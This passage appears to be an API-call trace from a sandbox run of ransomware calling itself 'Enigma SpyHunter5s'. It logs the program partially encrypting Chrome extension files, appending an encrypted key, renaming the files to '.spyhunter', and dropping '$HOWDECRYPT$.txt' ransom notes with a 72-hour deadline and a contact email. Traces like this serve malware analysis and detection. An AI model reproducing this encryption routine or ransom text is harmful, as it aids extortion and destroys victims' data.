lpNumberOfBytesWritten=0x57eb84*=0x127, lpOverlapped=0x0) returned 1 [0157.726] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.726] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb84, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb84*=0x2ac, lpOverlapped=0x0) returned 1 [0157.726] CloseHandle (hObject=0x9c) returned 1 [0157.726] GetProcessHeap () returned 0x2c0000 [0157.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f217e0 | out: hHeap=0x2c0000) returned 1 [0157.727] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb20 | out: pbBuffer=0x57eb20) returned 1 [0157.727] GetProcessHeap () returned 0x2c0000 [0157.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0157.727] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb18*=0x30) returned 1 [0157.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.728] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json") returned 164 [0157.728] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.728] GetProcessHeap () returned 0x2c0000 [0157.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.728] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eadc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eadc*=0x2800, lpOverlapped=0x0) returned 1 [0157.735] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.735] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eadc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eadc*=0x2800, lpOverlapped=0x0) returned 1 [0157.736] GetProcessHeap () returned 0x2c0000 [0157.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.736] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.736] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eadc, lpOverlapped=0x0 | out: lpBuffer=0x57eb1c*, lpNumberOfBytesWritten=0x57eadc*=0x4, lpOverlapped=0x0) returned 1 [0157.747] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eadc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eadc*=0x30, lpOverlapped=0x0) returned 1 [0157.747] CloseHandle (hObject=0x9c) returned 1 [0157.747] GetProcessHeap () returned 0x2c0000 [0157.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.749] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.spyhunter") returned 174 [0157.749] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.spyhunter")) returned 1 [0157.750] GetProcessHeap () returned 0x2c0000 [0157.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.750] GetProcessHeap () returned 0x2c0000 [0157.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0157.750] GetProcessHeap () returned 0x2c0000 [0157.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f21648 | out: hHeap=0x2c0000) returned 1 [0157.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.757] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.758] WriteFile (in: hFile=0x9c, lpBuffer=0x57ea53*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb7c, lpOverlapped=0x0 | out: lpBuffer=0x57ea53*, lpNumberOfBytesWritten=0x57eb7c*=0x127, lpOverlapped=0x0) returned 1 [0157.760] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.760] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb7c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb7c*=0x2ac, lpOverlapped=0x0) returned 1 [0157.761] CloseHandle (hObject=0x9c) returned 1 [0157.761] GetProcessHeap () returned 0x2c0000 [0157.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f214b0 | out: hHeap=0x2c0000) returned 1 [0157.761] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb18 | out: pbBuffer=0x57eb18) returned 1 [0157.761] GetProcessHeap () returned 0x2c0000 [0157.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0157.761] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb10*=0x30) returned 1 [0157.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.762] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json") returned 164 [0157.762] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.762] GetProcessHeap () returned 0x2c0000 [0157.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0157.762] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ead4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ead4*=0x2800, lpOverlapped=0x0) returned 1 [0157.773] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.773] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ead4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ead4*=0x2800, lpOverlapped=0x0) returned 1 [0157.773] GetProcessHeap () returned 0x2c0000 [0157.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.776] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.776] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ead4, lpOverlapped=0x0 | out: lpBuffer=0x57eb14*, lpNumberOfBytesWritten=0x57ead4*=0x4, lpOverlapped=0x0) returned 1 [0157.786] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ead4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ead4*=0x30, lpOverlapped=0x0) returned 1 [0157.786] CloseHandle (hObject=0x9c) returned 1 [0157.795] GetProcessHeap () returned 0x2c0000 [0157.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.795] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.spyhunter") returned 174 [0157.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.spyhunter")) returned 1 [0157.796] GetProcessHeap () returned 0x2c0000 [0157.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.796] GetProcessHeap () returned 0x2c0000 [0157.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0157.796] GetProcessHeap () returned 0x2c0000 [0157.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f21318 | out: hHeap=0x2c0000) returned 1 [0157.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.797] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.797] WriteFile (in: hFile=0x9c, lpBuffer=0x57ea4b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb74, lpOverlapped=0x0 | out: lpBuffer=0x57ea4b*, lpNumberOfBytesWritten=0x57eb74*=0x127, lpOverlapped=0x0) returned 1 [0157.798] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.798] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb74, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb74*=0x2ac, lpOverlapped=0x0) returned 1 [0157.798] CloseHandle (hObject=0x9c) returned 1 [0157.798] GetProcessHeap () returned 0x2c0000 [0157.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e640 | out: hHeap=0x2c0000) returned 1 [0157.799] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb10 | out: pbBuffer=0x57eb10) returned 1 [0157.799] GetProcessHeap () returned 0x2c0000 [0157.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0157.799] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb08*=0x30) returned 1 [0157.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json") returned 164 [0157.800] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.800] GetProcessHeap () returned 0x2c0000 [0157.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0157.800] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eacc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57eacc*=0x2800, lpOverlapped=0x0) returned 1 [0157.803] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.803] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eacc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57eacc*=0x2800, lpOverlapped=0x0) returned 1 [0157.803] GetProcessHeap () returned 0x2c0000 [0157.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.803] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.803] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eacc, lpOverlapped=0x0 | out: lpBuffer=0x57eb0c*, lpNumberOfBytesWritten=0x57eacc*=0x4, lpOverlapped=0x0) returned 1 [0157.953] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eacc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eacc*=0x30, lpOverlapped=0x0) returned 1 [0157.953] CloseHandle (hObject=0x9c) returned 1 [0157.954] GetProcessHeap () returned 0x2c0000 [0157.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.954] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.spyhunter") returned 174 [0157.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.spyhunter")) returned 1 [0157.955] GetProcessHeap () returned 0x2c0000 [0157.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.955] GetProcessHeap () returned 0x2c0000 [0157.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0157.955] GetProcessHeap () returned 0x2c0000 [0157.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e4a8 | out: hHeap=0x2c0000) returned 1 [0157.955] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb10 | out: pbBuffer=0x57eb10) returned 1 [0157.955] GetProcessHeap () returned 0x2c0000 [0157.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0157.955] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb08*=0x30) returned 1 [0157.955] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.956] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js") returned 166 [0157.956] StrStrW (lpFirst="mirroring_cast_streaming.js", lpSrch=".txt") returned 0x0 [0157.956] GetProcessHeap () returned 0x2c0000 [0157.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.956] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eacc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eacc*=0x2800, lpOverlapped=0x0) returned 1 [0158.005] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.005] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eacc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eacc*=0x2800, lpOverlapped=0x0) returned 1 [0158.005] GetProcessHeap () returned 0x2c0000 [0158.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0158.005] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.005] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eacc, lpOverlapped=0x0 | out: lpBuffer=0x57eb0c*, lpNumberOfBytesWritten=0x57eacc*=0x4, lpOverlapped=0x0) returned 1 [0158.014] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eacc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eacc*=0x30, lpOverlapped=0x0) returned 1 [0158.015] CloseHandle (hObject=0x9c) returned 1 [0158.015] GetProcessHeap () returned 0x2c0000 [0158.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.015] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 